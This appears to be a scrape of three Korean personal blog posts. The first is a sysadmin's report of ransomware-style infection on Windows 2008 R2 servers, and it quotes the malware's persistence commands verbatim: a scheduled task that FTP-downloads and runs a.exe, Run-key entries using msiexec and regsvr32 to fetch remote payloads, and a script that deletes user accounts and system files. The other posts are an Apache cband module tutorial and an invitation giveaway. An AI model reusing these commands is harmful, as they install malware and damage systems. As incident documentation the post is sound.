끝이나지 않는 랜섬웨어 / Ransom:Win32/WannaCrypt.A!rsm
일본 IDC 에 있는 블레이드 서버 장비에 Windows 2008 R2 OS 를 3대 설치했다.
혹시나 예전처럼 랜섬웨어가 걸릴까 했는데, 역시나 였다.
네트워크를 연결하는 순간 바로 걸려 버렸다.
OS 버전에 따른 취약점이 있는 건지, 나중에 상위 버전의 OS 를 설치 후 테스트를 진행해야 겠다.
암튼 일본쪽 네트워크는 회생 불능인것 같다. 가능하면 일본쪽은 사용 안하는것이 좋겠다.
이번에 확인 된 내용을 확인해 봤는데, 저번에 감염 된 내용하고는 조금 다른 부분이 있다.
해커놈들이 침해 파일의 내용 및 배포 경로를 수정하고 있는 것 같다.
윈도우 보안업데이트를 진행해도 원천적으로는 막을 수가 없는 것 같다. 일일이 찾아서 삭제하지 않는 이상은 처리가 안 된다.
아래는 이번에 파악 된 내용의 결과이다.
1. 작업 스케쥴러 등록
이름 : Mysa
트리거 : 서비스 시작시
동작 : cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
2. 레지스트리 등록
키 이름 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
데이터 : start1 msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q
3. 공격 파일 내용
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
ok[1].txt
[down]
http://78.142.29.114:8888/close.bat C:\windows\debug\c.bat 0
[cmd]
net1 start schedule
net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe
taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe
taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del
schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system" /sc onstart /F
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q" /f
echo 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
네트워크를 통해서 바로 감염이 되기 때문에, 최신 업데이트가 완료 된 백신을 로컬을 통해 먼저 설치 하고 네트워크 연결을 시도해야 하는 수 밖에 없는 것 같다.
그런데 이 방식은 거의 불가능하므로, 사후 대책을 진행해야 한다.
우선 윈도우 방화벽에서 인,아웃바운드 정책에 대해 재설정을 진행 했다.
백신도 실시간 감지 동작을 제거로 변경 하였다.
IDC 내에서 세팅을 진행하는 것이 아닌, 외부에서 세팅을 하고 서버를 반입 시키는게 가장 좋은 방법 인 것 같다.
일본쪽은 글러먹었다.
'윈도우 이야기' 카테고리의 다른 글
| Windows Server 2025 Preview 설치 테스트 (0) | 2024.06.18 |
|---|---|
| 폴더 항목 표시 정보 변경 (0) | 2018.04.11 |
리눅스 / 웹사이트 트래픽 제한 : cband 모듈 설치
웹호스팅 서비스를 제공하기 위해서는 필수적으로 각 웹사이트에 대한 트래픽 제한이 필요하다.
apache 에 적용 가능한 트래픽 및 대역폭 제한 모듈인 cband 설치 테스트를 진행 하였다.
테스트 환경 :
OS : CentOS release 6.9 (Final)
Apache : Apache/2.2.15 (Unix)
1. cbnad 모듈 설치.
설치 경로로 이동
# cd /usr/local |
wget 을 이용하여 설치 파일 다운로드
# wget http://cband.linux.pl/download/mod-cband-0.9.7.4.tgz |
하였는데, 다운로드가 실패 한다.
개발 웹사이트가 폐쇄되어 파일 다운로드 불가하다.
다른 사이트에서 다운로드 받은 후에 설치 경로에 파일 업로드 한다.
http://linux.softpedia.com/get/Internet/HTTP-WWW-/mod-cband-4737.shtml#download
압축 해제 및 경로 진입
# tar xvfpz mod-cband-0.9.7.5.tgz # cd mod-cband-0.9.7.5 |
configure 실행
# ./configure --with-apxs=/usr/sbin/apxs |
생성 실패한다.
로그를 확인해 본다.
configure:1340: checking for gcc configure:1369: result: no configure:1420: checking for cc configure:1449: result: no configure:1462: checking for cc configure:1508: result: no configure:1561: checking for cl configure:1590: result: no configure:1604: error: no acceptable C compiler found in $PATH |
gcc 가 설치가 되어 있지 않아서 발생하는 오류 이므로 설치를 진행 한다.
# yum install gcc -y |
gcc 설치도 했으니 다시 configure 실행한다.
# ./configure --with-apxs=/usr/sbin/apxs |
다른 에러가 나온다.
configure: error: Invalid location for apxs: '/usr/sbin/apxs |
원인 : apsx 경로 확인 불가
apsx 경로를 찾기 위해 명령어를 입력한다.
# find / -name "apxs" -print |
아무런 결과도 출력되지 않는다.
yum 을 이용해 apache 를 설치 했기 때문에, apsx 미등록 상태 였다.
httpd-devel 패키지 설치를 진행한다.
# yum install httpd-devel -y |
경로 재확인
# find / -name "apxs" -print /usr/sbin/apxs |
configure 및 make 실행
# ./configure --with-apxs=/usr/sbin/apxs # make # make install |
정상적으로 설치가 되었음을 확인했다.
chmod 755 /usr/lib64/httpd/modules/mod_cband.so [activating module `cband' in /etc/httpd/conf/httpd.conf] |
2. cbnad 설정 파일 생성.
httpd.conf 에 직접 설정을 추가해도 되지만, 관리의 용이성을 위하여 개별 설정 파일을 만든다.
# vi /etc/httpd/conf.d/cband.conf <IfModule mod_cband.c> <Location /cband-status> SetHandler cband-status </Location> <Location /cband-status-me> SetHandler cband-status-me </Location> <Location /~*/cband-status-me> SetHandler cband-status-me </Location> <Location /cband-status> Order deny,allow Deny from all Allow from 192.168.1.100/32 // 관리 페이지 접근 허용 아이피 </Location> </IfModule> |
3. vhost 설정
모듈 적용이 필요한 웹사이트의 vhost 를 수정한다.
(일일 트래픽 용량 5G 로 제한)
# vi /etc/httpd/conf/httpd.conf <VirtualHost *:80> ServerName gunnm.xyz ServerAlias www.gunnm.xyz Documentroot /var/www/html CBandLimit 5000M CBandPeriod 1D </VirtualHost> |
서비스 재시작
# service httpd restart |
웹브라우저에서 설정 확인
gunnm.xyz/cband-status
추가 옵션값은 아래의 링크에서 확인이 가능하다. 설명이 상세히 잘 되어 있다.
https://www.linux.co.kr/home/lecture/?leccode=10588
'리눅스 공부' 카테고리의 다른 글
| LVS (Linux Virtual Server)구축 : ldirectord + heartbeat (0) | 2018.08.08 |
|---|---|
| 리눅스 / 현재 시간 동기화 (0) | 2018.03.29 |
| 리눅스 / DNS 서버 구축 (1) | 2018.03.23 |
| 리눅스 / 워드프레스 설치 (0) | 2018.03.12 |
| resolv.conf 초기화 해결 (0) | 2018.03.09 |
티스토리 초대장 배포 9장 (등록 유효기간 2018.04.25)
안녕하세요.
티스토리로 부터 3월 초대장을 수령 하였습니다.
티스토리 블로그 개설이 필요하신 분들은 방명록 또는 댓글로 이메일 주소 남겨 주시면 발송하도록 하겠습니다.
등록 유효 기간 : 2018.04.25
마케팅 목적이 아닌, 티스토리 초대장이 꼭 필요하신 분들의 신청 바랍니다.
감사합니다.
'일상다반사' 카테고리의 다른 글
| 티스토리 초대장 배포 10장 (등록 유효기간 2018.08.24) (50) | 2018.07.27 |
|---|---|
| 티스토리 초대장 배포 10장 (등록 유효기간 2018.07.25) (58) | 2018.06.26 |
| 티스토리 초대장 배포 10장 (등록 유효기간 2018.06.25) (43) | 2018.05.28 |
| 티스토리 초대장 배포 10장 (등록 유효기간 2018.05.24) (80) | 2018.04.27 |
| 티스토리 초대장 배포 10장 (유효기간 2018. 03. 27) (22) | 2018.03.07 |
